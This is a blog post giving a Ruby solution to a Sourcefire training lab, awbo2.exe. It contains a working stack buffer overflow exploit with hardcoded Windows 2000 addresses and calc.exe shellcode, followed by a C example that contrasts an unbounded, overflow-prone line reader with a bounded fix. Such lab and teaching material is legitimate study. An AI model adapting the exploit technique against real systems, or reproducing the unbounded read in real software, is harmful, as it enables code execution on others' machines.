hammackj

Solution: awbo2.exe

I was feeling bored on Saturday after the wife went to bed, so I took a crack at the SourceFire VRT labs Advanced Windows Buffer Overflows. I started with the first one; below is the solution in Ruby. The shellcode is provided on the Sourcefire website and all it does is exec calc.exe. This series of executables seems to be all local exploits with an int3 staged for ease of debugging. Most of my time was spent in the debugger getting the space just right. I will post the rest of the solutions soon. Any questions?

#!/usr/bin/env ruby

#Jacob Hammack
#http://www.hammackj.com

read = [0x7C571931].pack('V') #kernel32 ADD BYTE PTR DS:[EAX],CL
jmpesp = [0x7C5725F3].pack('V') #kernel32 jmp esp


shellcode =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

print 'A' * 1024 + read + "JUNK" + jmpesp + shellcode

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>ruby exploit.rb | awbo2.exe

Then your post mortem debugger will catch the int3 at the beginning of the program; click run and you might see this screen. The addresses are only valid on Windows 2000 SP4 Roll-up 1; I provided the instructions to find them if you want to try to get it to work on anything else. I have not tried it on anything except my VM.

awbo2pwnage
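For readers who want to see the bug class these labs exercise from the other side, here is an added example in C (not code from the lab, the post, or Sourcefire): a line reader that copies stdin into a fixed stack buffer with no length check, next to a bounded version that rejects over-long lines. The buffer size, function names and the in-memory test input are constructed assumptions; nothing here reflects the actual layout of awbo2.exe.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the demonstration; not taken from awbo2.exe. */
#define LINE_CAP 1024

/* Vulnerable pattern: reads until newline/EOF with no regard for the
 * size of the destination.  A line longer than the buffer overwrites
 * whatever sits above it on the stack (saved EBP, return address),
 * which is exactly what a padded stdin payload exploits.
 * Kept for illustration; nothing below calls it. */
static void read_line_unbounded(char *dst, FILE *in)
{
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        *dst++ = (char)c;
    *dst = '\0';
}

/* Hardened version: never writes more than cap-1 bytes plus the
 * terminator.  Returns the number of bytes stored, or -1 when the line
 * did not fit (the rest of the line is drained so the caller does not
 * re-read the tail as a second line). */
static long read_line_bounded(char *dst, size_t cap, FILE *in)
{
    size_t n = 0;
    int c;
    if (cap == 0)
        return -1;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n + 1 >= cap) {             /* only room for the terminator */
            dst[n] = '\0';
            while ((c = fgetc(in)) != EOF && c != '\n')
                ;                        /* drain remainder of the long line */
            return -1;
        }
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return (long)n;
}

/* Runs the bounded reader over a constructed in-memory input (fmemopen is
 * POSIX) and returns its result; -2 signals a setup failure. */
static long bounded_read_from_string(const char *input, char *dst, size_t cap)
{
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    long r;
    if (!f)
        return -2;
    r = read_line_bounded(dst, cap, f);
    fclose(f);
    return r;
}

/* Feeds a line of line_len 'A' bytes into a buffer of cap bytes and
 * returns 1 if the bounded reader rejected it while leaving the buffer
 * NUL-terminated inside its bounds, 0 if the line was accepted. */
static int overlong_line_is_rejected(size_t cap, size_t line_len)
{
    char *line = malloc(line_len + 1);
    char *buf = malloc(cap);
    int rejected;
    long r;
    if (!line || !buf) {
        free(line);
        free(buf);
        return -1;
    }
    memset(line, 'A', line_len);
    line[line_len] = '\0';
    r = bounded_read_from_string(line, buf, cap);
    rejected = (r == -1 && strlen(buf) < cap) ? 1 : 0;
    free(line);
    free(buf);
    return rejected;
}

int main(void)
{
    char buf[LINE_CAP];
    long r = read_line_bounded(buf, sizeof buf, stdin);
    if (r < 0) {
        fputs("input line too long, rejected\n", stderr);
        return 1;
    }
    printf("read %ld bytes\n", r);
    (void)read_line_unbounded;
    return 0;
}
```

Piping the same 1024-plus-byte payload into the bounded build simply produces the rejection message: the length check, not the absence of an int3 or a trampoline address, is what removes the control-flow hijack.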